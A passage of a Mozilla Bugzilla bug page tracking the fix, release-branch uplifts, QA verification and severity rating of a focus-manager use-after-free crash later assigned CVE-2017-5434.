Comment 5•7 years ago
|
||
https://hg.mozilla.org/integration/mozilla-inbound/rev/c46c8e2804c2a64e8436290c032a3e8bf32b63b5
|
||
Comment 6•7 years ago
|
||
https://hg.mozilla.org/mozilla-central/rev/c46c8e2804c2
Status: NEW → RESOLVED
Closed: 7 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla55
|
||
Comment 7•7 years ago
|
||
| uplift | ||
https://hg.mozilla.org/releases/mozilla-aurora/rev/40527edab13c
|
|
||
Comment 8•7 years ago
|
||
| uplift | ||
https://hg.mozilla.org/releases/mozilla-beta/rev/cd266019f9ee
|
||
Comment 9•7 years ago
|
||
Comment on attachment 8850780 [details] [diff] [review] focusmanager_crash.diff This grafts cleanly to esr52. Requires a tiny (but trivial) rebase for esr45.
Attachment #8850780 -
Flags: approval-mozilla-esr52?
Attachment #8850780 -
Flags: approval-mozilla-esr45?
|
||
Comment 10•7 years ago
|
||
Comment on attachment 8850780 [details] [diff] [review] focusmanager_crash.diff sec-critical uaf fix for esr45/esr52
Attachment #8850780 -
Flags: approval-mozilla-esr52?
Attachment #8850780 -
Flags: approval-mozilla-esr52+
Attachment #8850780 -
Flags: approval-mozilla-esr45?
Attachment #8850780 -
Flags: approval-mozilla-esr45+
|
|
||
Comment 11•7 years ago
|
||
| uplift | ||
https://hg.mozilla.org/releases/mozilla-esr52/rev/ee0a7b55e470 https://hg.mozilla.org/releases/mozilla-esr45/rev/ccbecbe17a45
|
||
Updated•7 years ago
|
Group: dom-core-security → core-security-release
|
|
||
Updated•7 years ago
|
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+]
|
|
||
Updated•7 years ago
|
Alias: CVE-2017-5434
|
||
Updated•7 years ago
|
Whiteboard: [adv-main53+][adv-esr52.1+][adv-esr45.9+] → [adv-main53+][adv-esr52.1+][adv-esr45.9+][post-critsmash-triage]
|
|
||
Updated•7 years ago
|
Flags: sec-bounty?
|
||
Comment 13•7 years ago
|
||
I managed to reproduce this issue on Firefox 50.0b12 ASAN build, under Ubuntu 16.04 x64. The crash is no longer reproducible on Firefox 55.0a1(2017-04-13) ASAN build, Firefox 54.0a2(2017-04-13) ASAN build, 53.0b12 ASAN build, 53.0 ASAN build, Firefox 52.1.0 ESR ASAN build, 55.0a1(2017-04-12) build, Firefox 54.0a2(2017-04-12), Firefox 53.0 or on Firefox 52.1.0 ESR. Tests were performed under Ubuntu 16.04x64. Note that on Firefox 45.9.0 ESR ASAN and Firefox 45.9.0 ESR builds the tests were performed without installing install domfuzz_helper-2012.07.07-fx+fn+an.xpi, since it's not compatible with these two builds. Please let me know if it's necessary to perform another set of tests on 45.9.0ESR builds.
Status: RESOLVED → VERIFIED
Flags: qe-verify+ → needinfo?(bugs)
|
|
Assignee | |
Comment 14•7 years ago
|
||
if the patch applied to esr45, I think that should be enough here.
Flags: needinfo?(bugs)
|
|
||
Comment 15•7 years ago
|
||
Lowering severity to sec-high. Given the use of fuzzPriv.CC() and ASAN we shouldn't call this sec-critical unless we know how to trigger it in a normal build.
Flags: sec-bounty? → sec-bounty+
Keywords: sec-critical → sec-high
|
|
||
Updated•7 years ago
|
Group: core-security-release
|
||
Updated•5 years ago
|
Component: DOM → DOM: Core & HTML
|
||
Updated•21 days ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•